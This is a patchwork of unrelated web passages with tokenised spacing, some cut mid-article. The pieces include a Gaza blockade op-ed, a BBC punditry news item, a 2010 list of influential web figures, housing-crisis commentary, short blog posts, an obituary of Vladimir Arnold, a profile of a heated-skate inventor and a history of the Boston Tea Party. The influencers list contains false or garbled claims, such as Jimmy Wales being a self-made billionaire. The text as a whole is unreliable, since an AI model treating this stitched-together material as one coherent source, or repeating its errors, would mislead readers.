It is a miserable and impoverished place , but not strictly starving as claimed by some activists campaigning against the siege .
What exists are terrible humiliations .
While Israel 's Ministry of Foreign Affairs likes to boast about treating seriously ill Gazans in its hospitals , the process is so uncertain that patients have died waiting for approval .
The aftermath of last year 's Israeli war against Gaza left a legacy of widespread damage to homes , infrastructure and agriculture , the reconstruction of which Israel has blocked by preventing the passage of the materials required to rebuild .
Then there is the more pernicious impact of the embargo : economic , social and psychological .
Before the blockade , much of Gaza 's income came from the export of products such as flowers and strawberries and from day workers travelling to Israel .
Fishermen , too , are prevented from crossing a maritime exclusion zone policed by Israeli gunboats , visible cruising along the coast .
And in a place with crushing unemployment it is not only those at the bottom of the economic scale who have been punished by Israel 's enforced " diet " .
In a society that puts much emphasis on education , the opportunities for a generation of young Gazans to pursue the careers they have been trained for are very limited .
The consequence has been the creation of an angry and frustrated society which has become ever more radicalised and has learned to associate Hamas – as it once associated Yasser Arafat and his Fatah movement – with resistance and national self - determination .
The bitter irony is that it is not only Gaza that has been damaged by the blockade .
More than its two ill - fated wars in Lebanon , its numerous military offensives against its Palestinian neighbours , its targeted killings or even the construction of its separation wall , the prosecution of the blockade against Gaza – and the effort of justifying the unjustifiable – has corrupted Israel 's own increasingly militarised political culture .
With few exceptions until last week , most Israelis have demonstrated a shocking lack of interest in what is being done to Gaza in their name , echoing the general lack of empathy for those hundreds of civilians who died during Operation Cast Lead last year .
This can be explained in large part by the fact that Israel 's leaders and government have fostered an almost permanent culture of conflict , insisting that their country is " at war " and in the frontline against an Islamist insurgency against the west , rather than embroiled in a long - standing political and territorial crisis with a security component .
It has damaged Israel 's diplomatic relationships to the extent that it has now alienated Turkey , its closest Muslim ally , and pushed the US , which had largely ignored Gaza since Barack Obama 's inauguration , into calling for the blockade to end .
The critical issue is what the ending of that siege might mean .
If the lifting of the blockade means only the inclusion of more items on Israel 's list of goods that are allowed to enter Gaza , then the embargo will not have ended , it will only have been ameliorated .
For it to be truly lifted , a far more humane approach to Gaza 's residents is required .
It should be one that allows them access to the outside world both for their goods and to travel ; to develop as an economy and a society and to persuade Gazans that their home is not a prison but a place of opportunity .
For that to happen requires a wholesale change in Israel 's mindset as well as that of Hamas .
Hamas must be persuaded that as a broad movement it will lose nothing in accepting the right of Israel to exist .
Additional measures should include the release of kidnapped Israeli soldier Gilad Schalit and the commitment to a long - term ceasefire which Hamas has long suggested that it can deliver .
Israel , no less importantly , must recognise that its default position on the deterrent value of the disproportionate use of military force to solve problems not only undermines its standing in the international community but is deeply counterproductive , putting Israel in more peril , not less .
Diane Abbott is to be replaced as a pundit on BBC1's late - night political discussion programme
This Week by the former cabinet minister Hazel Blears following her bid to become Labour leader .
Abbott announced last week that she intends to contest the party 's leadership but has yet to secure the nomination of 33 MPs necessary to get her name on the ballot paper .
Nevertheless , the BBC has taken the decision to replace her on This Week because it was concerned her continued appearance as a pundit would breach its editorial independence guidelines .
Abbott is a regular on the show alongside host Andrew Neil and fellow pundit Michael Portillo , the former Tory minister , with whom she has formed a popular double act on the This Week sofa .
She told the Guardian today : " They told me I can [ continue on the show ] and it appears they 've backed off .
I find it very strange . "
Blears is a former Labour party chair and communities secretary , a role which she left last year .
Her resignation was seen at the time as evidence of Gordon Brown losing the confidence of his cabinet , as it came less than 24 hours after Jacqui Smith quit as home secretary .
Blears said she was leaving for " personal reasons " .
The Telegraph claimed she quit partly because of the revelation that she had not paid capital gains tax on the sale of two properties .
She was returned as MP for Salford earlier this month , having been first elected to parliament in 1997 .
A BBC spokesperson , said : " For the sake of fairness to all the candidates for the Labour party leadership , while Diane is a candidate she wo n't be making her usual appearance on the This Week sofa . "
• To contact the MediaGuardian news desk email editor@mediatheguardian.com or phone 020 3353 3857 .
For all other inquiries please call the main Guardian switchboard on 020 3353 2000 .
• If you are writing a comment for publication , please mark clearly " for publication " .
The 10 Most Influential People on the Web – 2010
As the Internet is gaining popularity these days so are the people related to it .
Many Internet Enterpreures have got them listed in many top lists across the world , so here we are with the list of top ten Internet celebrities of 2010 .
Mark Zuckerberg
The 26 year old guy , best known co-founder of the most popular social networking site in the world .
Forbes magazine listed him as the youngest self made billionaire with a personal wealth of $ 4 billion .
Microsoft corp. bought 1.6 % stack in Facebook Inc. in 2007 which rocketed the market value of Facebook to a whooping $ 15 Billion .
There is also a movie which has been made on life of Zuckerber , starring Justin timberlake and Jesse eisenberg , which is all set to release this year and the Movie is call The Social Network .
Sergey Brin , Larry Page and Eric Schmidt
The combined wealth of all three is approx $ 40 Billion and to add to that they are responsible for running the worlds most visited search engine Google .
There is no doubt that Google is the most powerful invention of the web .
Apart from being the search engine king they also own the biggest ad network in form on Adwords , Google also acquired the biggest video website Youtube in 2006 paying more then $ 1.5 Billion .
Since then Google has acquired many companies and they have also tried their hand on Facebook but failed to convince founder Mark Zuckerberg .
Michael Arrington
The founder of Techcrunch , who was selected as one of the most influential people in the world by TIME Magazine .
He also made an online payment company called Achex , which was later sold to First data corp. for $ 32 million .
Techcrunch which started as a blog has now become a web publication for technology news .
Steve Jobs
The co-founder and chief executive of Apple Inc .
Steve is a person with aggressive and demanding personality and with this kind of nature he had been able to take Apple to next level and beat Microsoft to grab the first position as the biggest tech company .
Matt Mullenweg
The developer of WordPress , world ’s most used open source blogging platform .
He is a young entrepreneur who is also involved in public speaking .
Thanks to his creation that blogging got a new dimension from just being a sub- domain of Blogspot.com etc .
Today millions of blogs use wordpress as a blogging platform .
Some of the most popular websites run on WordPress are Techcrunch , Huffingtonpost , Mashable and more .
Jimmy Wales
Jimmy Wales a well known internet entrepreneur and the co-founder and promoter of Wikipedia .
Born in a town named Huntsville , Alabama , Married twice with a daughter from her second wife .
This person gave us a very unique website named Wikepedia the online encyclopedia .
Which not only made him popular but also has made him enlisted in the list of few self made billionaires and successful people in recent years .
Arianna Huffington
Well this Lady has definitely gathered a lot of controversies against her during her lifetime and success also .
A very Influential lady and the co-founder of the well known News Website The HuffingtonPost , who also bagged a no 12 position in Forbe ’s first premiere list of the most influential Women In media .
And now after her websites success on the www world she has now become one of the most influential person on World Wide Web .
Craig Newmark
Craig Alexander Newmark who provided a whole new dimension to the internet Advertising World .
His Well Known Creation Named Craiglist .
A website that provides free online classified advertisement listing of products , services , jobs and discussion Forums around the world .
Started in 1995 the site has made innumerable rounds in news this year with its gaining popularity .
Now with over twenty billion page views per month the site has successfully made its place in the top 50 websites on the World Wide Web .
Making Craig a well known Internet Celebrity .
Evan Williams
People might know Him as the CEO of twitter but I will definitely call him the father of blogging .
Evan has really contributed a lot to the Internet world and he gave the word blogger to the World Wide Web for the first time .
A Born American , he has marked his presence on Internet since many years with some of his outstanding works like Pyra Labs ( creator of Weblog and Blogger Software ) .
With his unique contributions and inventions he has made to the top of many Influential People lists around the globe in recent years .
Steve Ballmer
One of the richest people on earth with an estimated wealth of around $ 15 billion and the CEO Of the Microsoft Corporation since 2000 .
He is the one who is responsible for all the Microsoft ’s activities around the globe making him the top most Influential person on internet undoubtedly .
Popular for his extraordinary different Behavior and achievements , he has definitely overpowered Bill gates in the recent years .
Media has also tagged him as the man who rules Microsoft in the year 1992 , thus making him the most and highly influential person on internet till now and the richest too .
Our story so far :
Following the 2000 Dot Com crash , then Fed Chair Alan Greenspan brought Fed Funds rates down to ultra - low levels .
Under 2 % for 3 years , and 1 % for more than a year .
Rates this low — and for that long — were simply unprecedented .
They wreaked havoc with the traditional fixed income market .
Bond managers scrambled for yield , and found it in investment grade , triple A rated residential mortgage - backed securities ( RMBS ) .
This better interest rate was created by securitizing mortgages with an unhealthy slug of higher yielding , riskier , sub - prime mortgages .
The demand for RMBS paper was nearly insatiable .
Wall Street sucked up as much sub - prime paper as could be legitimately , then illegitimately produced .
Lend - to - securitize - nonbank mortgage writers responded to the demand by abdicating traditional lending standards .
30 year mortgages were given to people who in no conceivable way could afford them .
The hope was a non -default over the warranty period of the mortgage , typically 90 or 180 days .
The Greenspan Fed , in charge of supervising financial lending institutions , looked the other way .
The net result of this was a credit bubble and a housing boom .
( A true housing bubble formed only in a handful of places ) .
The credit bubble allowed 10s of millions of Americans to become , albeit temporarily , home owners .
In 1992 , some 4 million homes per year were being purchased .
A decade later , that number had risen 25 % to 5 million .
A mere 3 years later , annual sales were 7 million units — a 40 % increase .
From 2002 to 2007 , the abdication of lending standards — who cares about credit scores , incomes , debt load , assets , even job ! — created millions of new homeowners .
And thanks to the ultra low rates , prices had exploded .
The combination of brand new , unsophisticated buyers and rapidly rising prices was a dangerous combination .
Buyers of limited financial means who en masse overpaid for their houses at ultra low rates was a recipe for disaster .
The Fed began its cyclical tightening , price appreciation slowed , then reversed .
Sales plummeted , and prices fell .
Five million of those buyers were foreclosed upon , with another 5 million likely to come .
Which more or less brings you up to date .
~~~
Today , residential real estate confronts numerous headwinds : Credit , once given to anyone who could fog a mirror , is now tight .
Hence , demand is far below what it was during the past decade .
Home prices are still unwinding from artificially high levels , and remained over - priced .
Inventory is elevated .
Unemployment remains high .
A huge supply of shadow inventory is out there : Speculators and flippers who overpaid but have held onto their properties await modestly higher prices to sell .
Bank owned real estate ( REOs ) continues to increase .
We are barely halfway through a decade long foreclosure surge .
This is known , or at least should be by those who have looked at the data .
I cannot explain why some economists still have not figured this out .
Banksy Gets Dissed ?
New Banksy pieces have been found all over NY .
But since they went up they 've been defaced .
" Smart Crew , Posterboy ( Not Henry ) , Emjay and weird face guy " insignia have been found on the new pieces .
[ Ed. Note :
As ohhleary put it : THIS IS WHY WE CAN'T HAVE NICE THINGS . ]
← Sidebar
The museum of armored forces in Kubinka ( Moskovskaya oblast , about 63 km to the west of Moscow city ) is one of the largest in Russia and has the unique collection of war machines .
The photos were captured by k_kronos .
Tags : Moskovskaya oblast · museum · tanks
<< Vologda oblast page was updated
Volgograd oblast page was updated >>
No comments yet .
Andrew Bell ’s DYZPLASTIC
Android toys are finally here , and i’m a little obsessed .
They are ADORABLE .
And oh so detailed in all the right ways … and that glow in the dark radioactive one … just stunning .
And how some have arm tattoos … or cufflinks … or tramp stamps … or awesome logos … and swirls in the eyes … you really must see them all !
Also as much as i ca n’t stand blind box toys conceptually , i do adore that 5 year old feeling of joy when you sit and tear through a case of little boxes and their foil wrapped innards .
Take a peek at all their close ups on the next page !
Including two of the secret chase characters !
p.s. as i play with these , i ca n’t help but wonder , why do n’t more OS ’ have awesome little mascots ?
p.p.s. Soooo , it sounds like demand has FAR exceeded expectations ~ which is awesome !
Unfortunately that means these little guys are hard to get your hands on .
However , Andy wanted me to assure you that there will be more Series 1 available this summer ~ which really is just a blink away … so sit tight , and / or grab some when you see them !
On May 16 , Coast Guard investigator Paul Shultz was walking along a Key West , Florida marina when he came across a red Nikon L18 .
Although the underwater housing surrounding the camera was battered from what appeared to be a long period at sea , the camera was in tip top shape .
After finding nothing in the photos and videos on the memory card that pointed to the owner , Shultz turned to the Internet , posting the photos to Scubaboard.com .
Within days , it was determined from clues in the photos that they were taken in Aruba , about 1,100 miles from where the camera was found .
The clues included a plane ’s tail number that revealed that the plane was in Aruba the day the photo was taken , a blue roof that was located on Google Maps , and a school poster written in Dutch ( Aruba is a Dutch island ) .
Once the camera ’s origin was known , Shultz published the photos to Aruba.com .
Within two days a woman recognized the children in some of the photos as her son ’s classmates and , after contacting the family , the mystery was solved .
Dick de Bruin , a sergeant in the Royal Dutch Navy , was salvaging an anchor from the USS Powell for a WWII memorial when his camera floated away .
One way or another it ended up 1,100 miles to the north and into the hands of Paul Shultz .
An interesting part of this story is that among the things found on the memory card was a video recorded by a sea turtle that dragged the camera for a period of time during the journey .
The shaky video has amassed hundreds of thousands of views on YouTube :
This story is similar to one we reported on in February , where a camera was returned to the owner after spending a year on the ocean floor .
Looks like “ photo in a camera ” is the new “ message in a bottle ” .
( via The Associated Press )
Image credit : Sea Turtle by NOAA ’s National Ocean Service
What 's the Sound of Grassroots Singing ?
Back when we lived in tribes , music was everywhere , made by everyone in the tribe .
It was constant and free .
It belonged to everybody .
It was magic , transformative , powerful , and absolutely essential to our health and survival .
It was particular to a tribe and a place .
We made our own culture , like we made our clothes and our shelter .
We had songs for every passage - - birth , coming of age , marriage , death - - songs for the hunt , the work , the worship , the stories .
Everybody sang .
We do n't have tribes anymore , but we can still gather , and we can still make our own music with our own voices and hands .
We can reclaim that power and that boon .
We can make some culture .
Here 's how we 're doing it with the Community Music Project .
How the Community Music Project Began
The Community Music Project is rooted in the rich , creative , and vibrant soil of the Carrboro / Chapel Hill / Chatham County North Carolina community .
We started out recording our family 's songs , and the songs of a few friends , for a family Christmas present .
We liked it , we began to think a little bigger , and the Community Music Project began .
Since 2000 , we have produced one CD every year .
We record local songwriters and singers , compile the songs and artwork into a CD , press 1000 copies , and give them away to the CD musicians , friends , and community members -- wherever we think the music will be appreciated .
Many of the people who value the music and what we are trying to do give us donations to keep the project going .
Free Music -
It 's Revolutionary
The goals of this website are :
To share our local music more widely , and keep it free
To help others get their own community music projects started , by providing as much information as we can from our experience doing this
About This Web Site
This internet site is an attempt to explore other ways to distribute the music we are producing .
At this site , you will find the music itself as downloadable MP3 files as well as the artwork from the CDs in downloadable / printable PDF files .
We invite you to download and manufacture your own CDs for yourself and as gifts for your friends .
We ask only that you refrain from using these copyrighted recordings and artwork commercially ( for money ) without prior permission from the copyright holders .
These songs , and the accompanying artwork , are copyrighted ; they are not in the public domain .
If you have any questions about how our policy might apply to your situation , please e-mail us at info@communitymusicproject.org and put " Project Copyright Policy " on the subject line .
Once again , if you do not put " Project Copyright Policy " on the subject line , our spam filter will toss your message into the bit- bucket .
We can press typical CDs , including typical printed artwork , packaged in paper sleeves ( rather than jewel cases ) , for less than $ 1,500 per 1000 CDs .
Internet download distribution is expected to cost less than 10 cents per downloaded copy .
Russian Vladimir Arnold , one of the most important mathematicians of the 20th century , died Thursday in France just a few days short of his 73rd birthday , Russian news agencies reported .
Arnold , who arrived in France about two months ago for medical treatment , was suddenly taken ill with peritonitis and admitted to a Paris hospital on Wednesday , reports said citing his associates .
" It happened very suddenly .
He was admitted to hospital yesterday ( Wednesday ) evening .
He underwent surgical intervention but he did not survive the operation , " said Maxim Kontsevich , a mathematician friend living in France .
Born on June 12 , 1937 at the Ukraine port city of Odessa , Arnold was notably the coauthor of the KAM theorum of classical mechanics developed in the 1950s and bearing the initials of its creators , Kolmogorov , Arnold and Moser .
He " was one of the most eminent contemporary mathematicians from all points of view , " said the Russian Academy of Sciences vice president Valeri Kozlov , cited by the Itar - Tass agency .
" His work contained many things indispensable to the other sciences , " including physics , chemistry and biology , Kozlov said .
In 1974 the Soviet Union opposed Arnold 's award of the Fields Medal , the most prestigious recognition in work in mathematics that is often compared to the Nobel Prize , making him one of the most preeminent mathematicians to never receive the prize .
Arnold however received many other awards for his work , including the Crafoord Prize in 1982 and the World Prize in Mathematics in 2001 .
He became a member of the French Academy of Sciences in the 1980s .
Arnold worked at the Steklov Mathematical Institute in Moscow and then the Moscow State University before he retired .
Explore further French - Russian mathematician Gromov wins Abel prize
( c ) 2010 AFP
Click : When We Knew We Were Feminists
Some of you may have already heard about the awesome new anthology " Click : When We Knew Were Feminists " edited by Courtney Martin and J. Courtney Sullivan .
The FBomb is lucky enough ( and let 's just say it , cool enough ) that one of our regular contributers , Nellie B. ( Vandalize Gay , A Feminist Goes to the Ballet , Prom and Assimilation to name a few ) , is actually published in it !
She was also nice enough to let us publish an excerpt from her essay .
Here 's what she had to say :
Hi , FBomb readers and other feminists !
I 'd like to share with you the first few paragraphs from an essay entitled " Seventeen Years of Ridicule , " which I wrote for Click : When We Knew We Were Feminists , an awesome anthology edited by Courtney Martin and J. Courtney Sullivan , out now from Seal Press .
The book 's theme is " click moments , " or those moments in the identity or concept of " feminist " clicks with you .
Contributors include Jessica Valenti , Shelby Knox , Amy Richards , Jennifer Baumgardner and other great writers and activists .
Check it out !
Seventen Years of Ridicule : A Young Feminist 's Polemic by Nellie Beckett
Click :
The honks when I walk down the street .
Click :
The snickers of classmates when I speak up .
Click :
The screech of misogynist lyrics .
Click :
The laughs at sexist jokes .
Click :
The sickening thud in the pit of my stomach when I walk home alone at night .
I ’ve been a feminist as long as I can remember .
Though I ca n’t discern a particular “ click ” in my memory , perhaps it was when I was born at home and bestowed my mother ’s last name because my parents wanted to subvert the patriarchal naming system .
Perhaps it was at the age of two when I expressed a preference for blocks and toy trucks instead of Barbie dolls .
Perhaps it ’s just the experience of growing up female in a misogynistic society .
Fortunately , I ’ve had the privilege of a supportive home environment .
Ever since I can remember , my feminist mother has taught me to analyze the implicit messages in Cinderella , speak out against misogyny and stick up for myself and others .
My politics are also shaped by my father , who taught me to cook , read me Pippi Longstockings and took me to the 2004 March for Women 's Lives .
Personally , I ’d like to think that I have played an integral role in shaping the feminist beliefs of my two fabulous younger sisters .
Still , it ’s not easy growing up female , especially when you ’re teased from a young age for having a loud mouth and strong opinions .
The label “ feminist ” memorably resonated in second grade , when I sat transfixed through an entire documentary on the Seneca Falls Convention .
When I read Reviving Ophelia at the age of ten , I realized that I could n't make the transition from confident kid to depressed , troubled teenager like so many of the girls profiled in the book .
The more books I read and the more injustice and sexism I saw , the more feminism made sense .
Thus my career as a raging , self - identified radical feminist was born .
Feminism instantly clicked because it was a way of seeing the world that made sense , respected and aligned with my perceptions of society .
The more I learned about the movement , the more power I felt .
Identifying as a feminist has fortunately inspired both mundane and life - changing decisions .
To read the rest of Nellie 's superfabulous essay - and other " click " moments , you can buy the anthology here .
CALGARY , Alberta -- Tory Weber worked the midnight shift monitoring the boiler room in the basement of a posh hotel in Banff National Park .
It was a boring job for a college student in his early 20s , but the pay , and the dollar - a - day room and meals , made it hard for him to quit , especially with a new silver Mazda RX7 parked outside .
So Weber put his feet up on the desk , his hands behind his head , and thought , " God , you 'd just about have to kill me for me to change my life . "
Seconds later , a chunk of concrete fell from the ceiling , which was being remodeled .
It severed the hotel 's main gas line , just 20 feet from Weber 's desk .
Natural gas hissed out of the punctured 1 - inch steel line near two flame - shooting boilers .
Firefighters said it was pure luck the hotel did n't explode .
For Weber , that second chance was a catalyst to follow a dream hatched in childhood .
Inspired by Spud Gun
A few years before the hotel incident , Weber had an idea that stemmed from another accident .
Painful , but not nearly as dangerous .
It was a cold February day at his parents ' house in Calgary .
He stepped into his shoes , which had been sitting on a heat vent , and walked out onto the icy stairs to get the evening newspaper .
His warm shoes melted the ice and sent him reeling onto his rear end .
The same thermodynamics class that eventually landed him the boiler room job made Weber ponder the effect his heated shoes had on the ice .
Like most men in Canada , Weber had grown up with a stick and a puck and a number of idols in the NHL .
As Weber nursed his aching back , the idea struck him :
What would happen if hockey players could skate on heated blades ?
Tory Weber , inventor of heated ice skates for Thermablade , has pursued the idea of a heated hockey skate for more than 25 years .
Paula Lavigne / ESPN
That sort of " aha " moment puts Weber in good company with other would - be inventors .
Applications for patents pending with the U.S. Patent & Trademark
Office relating to sporting equipment number in the thousands .
About 6,600 pertain to golf , which includes 1,900 related to golf balls alone .
For what seems like a relatively simple device -- a hockey puck -- there are 22 applications alone .
It 's a tough market for the backyard inventor , going up against the scientists and engineers with the big - time research departments for companies such as Nike , Callaway and Russell .
Some ideas are minor modifications on existing equipment , such as a football glove with a better grip .
Others are more novel .
Think of antibacterial chalk used in weight rooms , basketball rims that project holographic ads with every swish , and a robot that scurries after stray table tennis balls .
Bringing any invention to market is a challenge .
Pioneering a new sporting device comes with the added hurdle of getting it accepted by any of the major leagues or governing bodies that set the rules for each sport .
Weber found that out the hard way .
Over 25 years ,
Weber 's idea for a heated hockey blade would propel him to stardom , hobnobbing with hockey legends Wayne Gretzky and Bobby Clarke .
And it would drive him to despair , after a decision by the NHL sent him into bankruptcy .
And finally , a last - minute salvation came to fruition just a few months ago , with a shot yet again to make the pros .
Weber 's idea -- like many others -- was quite rudimentary in its early iterations .
He first tried using a blowtorch to heat the blades .
One version involved a motorcycle battery and the heating element from a vehicle 's rear - window defogger .
Weber thought that a new invention would be his ticket to fortune -- just like it had been for E. Joseph Cossman .
Cossman was an inventor who made millions from turning simple , often bizarre ideas into lucrative products .
Remember the Spud Gun ?
Or the Plastic Ant Farm ?
Weber learned about Cossman from books and cassettes his mother bought to help her and her husband , who was a carpenter , market a line of designer playhouses .
" That 's what I really wanted .
To invent anything I could , to get out of the lifestyle I was in , " Weber said .
" In my young , little mind I thought if you invent something , you can get yourself out of a big hole . "
Lead - weighted pucks
As a child , the middle brother of three boys , Weber and his family lived in the basement of an unfinished house with no running water in the rural countryside outside Armstrong , then a town of about 2,500 people in south central British Columbia .
The boys played hockey on nearby frozen ponds using donated , used equipment .
When money got scarce , Weber 's stepfather would drive to a nearby grocery store and fish through trash bins for loaves of moldy bread , brown bananas and other discarded food to get the family through the week .
" It was n't good where we were growing up , " Weber said .
" I thought if you worked your ass off you could get out of the mess , and that 's really what it was . "
His first foray into inventing was a weighted hockey puck he tried to develop in the late ' 80s with the help of his soon - to - be wife , Shawna .
Just two months into their courtship , Weber asked Shawna to go on a picnic .
He picked her up in the garbage truck he used for his part - time job hauling trash .
The truck was loaded with 1,000 pucks , a kettle and 20 pounds of lead fishing weights , pilfered from his grandfather 's garage .
He got a few weights melted over a raging bonfire before a park ranger kicked them out .
Weber used his retirement savings and credit cards to try to finance the idea .
Courtesy Tory Weber
" It was kind of exciting , " Shawna said , recalling the fiasco .
" I 've never been on a date where somebody melted lead before . "
Weber had planned to pour lead into the hollowed - out pucks to create a weighted training puck that would help players build muscle .
The pucks had a habit of shattering sticks , however , and they got relegated to the Webers ' garage , alongside his beer bottle collection .
( Several years later , Weber sold the pucks and bottles together for $ 15 at a flea market . )
But that first failure did n't deter him , because he could always go back to that day in the basement boiler room for inspiration .
It was no coincidence that he had just recently begun to accept Christianity -- mostly at his older brother 's urging .
He even had a Bible hidden in his top desk drawer .
" I just thought , ' OK , God , it 's not often that you speak to people this bluntly .
I 'm so thick I need to have it spelled out to me that way , ' " he said .
He quit his job at the hotel .
In the summer of 1988 he moved back to Calgary with a renewed confidence in God and his own ingenuity .
" That 's really where I got the ability to take on these huge , huge projects .
I felt I could do anything .
As long as God can , I can . "
Blades reduce friction
Weber began tinkering with his blade in earnest -- running tests , crafting prototypes and asking for advice .
Shawna described how he once froze ice on one of her cookie sheets and rigged up a device to warm the blade using an electrical cord plugged into a kitchen outlet .
" It started on fire , " he said , laughing .
Weber then made a crucial ally in retired NHL right winger Rich Sutter , who was buying lumber for an outdoor ice rink from the building supplies store where Weber worked .
And Weber talked Sutter into a test ride .
" I got one of those batteries and I taped it onto the side of his blade and put the element on the outside of the blade and asked him to go for a skate , " Weber said .
" He said , ' Wow , this is something awesome . '
He said if you can contain this thing you 've got a hit . "
But that was the problem ; all of the batteries with enough power to heat the blade were too big to conceal inside the skate .
It just was n't feasible to strap a half - pound battery -- about the size of a camcorder battery in the early 1990s -- to the outside of a hockey player 's boot .
Removing slavery from the Revolution takes some doing .
In 1764 , Otis insisted , in the same pamphlet in which he denounced taxation without representation , “ The colonists are by the law of nature freeborn , as indeed all men are , white or black . ”
The Boston Town Meeting instructed delegates to the legislature to propose a law prohibiting the purchase of slaves .
Worcester ’s Town Meeting urged emancipation .
“ The years 1765 and 1766 will be ever memorable for the glorious stand which America has made for her liberties , ” one Boston merchant wrote .
“ How much glory will it add . . . if at the same time we are establishing Liberty for ourselves and children , we show the same regard to all mankind that came among us ? ”
This meant a choice .
Massachusetts could either abolish slavery ( in 1772 , the landmark Somerset case would effectively end slavery in England ) or it could lead the colonies in the effort to resist parliamentary rule .
It could not do both .
When the anti-slavery bill finally came up for a vote , a friend warned John Adams , “ If passed into an act , it should have a bad effect on the union of the colonies . ”
It failed .
In 1773 , Boston ’s blacks petitioned the Assembly , “ We expect great things from men who have made such a noble stand against the designs of their fellow - men to enslave them . ”
That summer , the question at Harvard ’s graduation debate was “ the Legality of Enslaving the Africans . ”
By then , though , everyone was concerned about tea .
Parliament passed the Tea Act , in May of 1773 , in order to bail out the East India Company , which , with a surplus of tea and stiff competition from smugglers , was facing bankruptcy .
In the fall of 1773 , ships loaded with tea were sent to four cities : Boston , New York , Philadelphia , and Charleston .
In late November and early December of 1773 , the Beaver , the Eleanor , and the Dartmouth arrived in Boston Harbor .
( A fourth ship ran aground off Cape Cod . )
They had twenty days to unload their cargo .
At ten o’clock on the morning of December 16th , five thousand people showed up at Boston ’s Old South Meeting House to decide what to do .
They debated for hours .
Today , that debate is restaged at Old South most weekdays , by kids from the city ’s public schools , who research real people , and play parts .
One Wednesday last month , I watched a class of fifth graders from Dorchester duke it out .
Zerah Jakub works for Old South ’s education program .
“ Mr. Samuel Adams , where are you ? ” she called .
Up to the front stepped a dark - skinned boy with glasses , to denounce the Tea Act .
A tiny , willful girl played a shoemaker named George Robert Twelves Hewes : “ Gentlemen , we cannot let the King and Parliament treat us like this . ” “ Fie ! ” the little Loyalists cried .
“ King George treats us well , ” another girl whispered , from behind brown bangs .
( The kids are always surprised to discover that , by eliminating duties on tea in England and lowering the import tax to just three pence , the Tea Act actually reduced the price of tea in the colonies . )
“ But we did not get to vote on it , ” a kid with dimples pointed out .
Finally , the small Samuel Adams shouted , “ This meeting can do nothing more to save our country ! ”
Thirty - seven fifth graders nearly blew the roof off : “ Huzzah ! ”
Adams ’s shout may have been the signal for three groups of men , about fifty altogether , to head to prearranged spots , including the print shop of Benjamin Edes ’s Boston Gazette and possibly the Green Dragon , where they disguised themselves as Mohawks , smearing their faces with soot .
Then , while townspeople watched and joined in , they marched to Griffin ’s Wharf , boarded the three ships , and dumped into the harbor three hundred and forty chests of tea .
In 1973 , after Nixon ’s Bicentennial Commission failed in every attempt to organize a national celebration , it narrowed its focus to four cities , with Boston as its flagship .
Kevin
White , Boston ’s mayor , decided to make the Bicentennial a highlight of his administration ; he set up his own commission , Boston 200 , and began searching for corporate sponsors .
The Bicentennial Beaver set sail from Denmark in May of 1973 , her voyage made possible by the makers of Salada tea .
The Salada Beaver reached Massachusetts in October , 1973 .
“ I ’m not a crook , ” Nixon told reporters on November 17th .
On December 10th , the Boston Globe covered its front page with an illustrated editorial titled “ THE BOSTON TEA PARTY . . . AND THIS GENERATION ” : “ It is not just the 18th century that tried men ’s souls .
Our generation , too , has to act on democratic — and constitutional — principles in the face of arrogant use of power . ”
Tea Party Weekend was intended to be the national kickoff of the Bicentennial .
On the morning of December 16th , more than a thousand people gathered at Faneuil Hall for a meeting held by the Peoples Bicentennial Commission , where Thomas Boylston Adams , a descendant of John Adams and the president of the Massachusetts Historical Society , called for Nixon ’s impeachment .
He argued that , instead of a day of commemoration , the anniversary “ should be a day of mourning , because in the executive branch of government we see the corruption , the rot , the arrogance ” that the 1773 tea partiers protested .
Then everyone in the hall marched to the waterfront .
By noon , as falling snow turned to sleet , an estimated forty thousand people gathered to watch the action on board the Beaver .
The National Organization for Women was picketing : “ Taxation Without Equal Rights Is Tyranny . ”
Another banner read “ Gay American Revolution . ”
Rock music blared from loudspeakers .
At two o’clock , men from the Charlestown Militia , a reënactment group founded by an Irish - American longshoreman named Jim O’Neil , boarded the Beaver and dumped casks of tea into the harbor .
Minutes later , six protesters boarded the ship and unfurled a flag that read “ Impeach Nixon . ”
The Associated Press reported , “ A member of the group , wearing a huge mask resembling President Nixon ’s face , circled the brig in a rowboat and waved his hands high in Nixon ’s familiar ‘ V ’ style . ”
On board , they tarred and feathered an effigy of the President .
What happened in Boston that day made front - page news across the country .
The coverage was n’t the kind Kevin White wanted .
“ The first anguished attempt to make something — anything ” out of the Bicentennial , according to an editorial in the Washington Post , was “ distinguished by commercial and ideological hucksterism . ”
The whole thing , including the protests , was “ strained , self - conscious , artificially contrived , ” and “ concocted . ”
Watergate made everything look bogus .
This year , the day before the House vote on the health - care bill , the Boston Tea Party held a rally in front of Faneuil Hall .
Several dozen people turned up .
Some waved flags of thirteen stars .
Most carried signs : “ The Constitution SPEAKS . ” Christen Varley told a woman with a Hitler sign to leave .
The place was bustling with tourists on their way to shop at Quincy Market .
Austin Hess , wearing his tricorne and a mock - Obama campaign T - shirt that read “ NOPE ” instead of “ HOPE , ” posed for snapshots in front of a statue of Samuel Adams .
A nurse from Worcester who grew up in the Midwest and is registered as an Independent explained what getting back to the country ’s eighteenth - century roots means to her : “ I do n’t want the government giving money to people who do n’t want to work .
Government is for the post office , and to defend our country , and maybe for the roads .
That ’s all . ”
“ Can you imagine if the British said not only do you have to pay a tax on the tea but you have to buy the tea and you have to buy tea for your neighbor ? ”
Hess said .
He told me that he had briefly thought about printing out a copy of the twenty - four - hundred - page health - care bill and dumping it into the harbor , but when he learned that he would get arrested for it he changed his mind .
A lot of other junk has been dumped into Boston Harbor over the years , though .
In 1988 , the Just Say No days , a troop of Boy Scouts dumped a cask labelled “ CRACK . ”
Four years later , Teamsters meeting on Labor Day poured cans of beer into the water , and then tossed in the empty cases , though that sounds more like littering .
In 1997 , a bunch of doctors and nurses , wearing scrubs , boarded the Beaver and threw overboard some H.M.O.s ’ annual reports .
Dick Armey once unloaded a copy of the U.S. tax code .
Three years ago , state senators from Massachusetts , Texas , Georgia , and Virginia went to the wharf toting boxes of unfunded federal mandates .
The dumping of the tea was n’t always such a big deal .
In 1823 , its fiftieth anniversary passed without observance .
Not so the rest of the semi-centennial .
“ Those who established our liberty and our government are daily dropping from among us , ” Daniel Webster said , as the cornerstone was laid for the Bunker Hill Monument , in 1825 .
The following year , Adams and Jefferson died on the fiftieth anniversary of the Declaration of Independence .
In 1831 , Holmes wrote a poem about an old man who was known around Boston as “ the last of the cocked hats , ” with his “ old three - cornered hat , / And the breeches , and all that , ” and who was the best - known surviving participant of what had always been called , simply , “ the destruction of the tea , ” until George Robert Twelves Hewes was found in New York .
As the historian Alfred F . Young discovered a few years ago , this business with the tea was n’t called a “ tea party ” until 1834 .
The name made it sound like a political party .
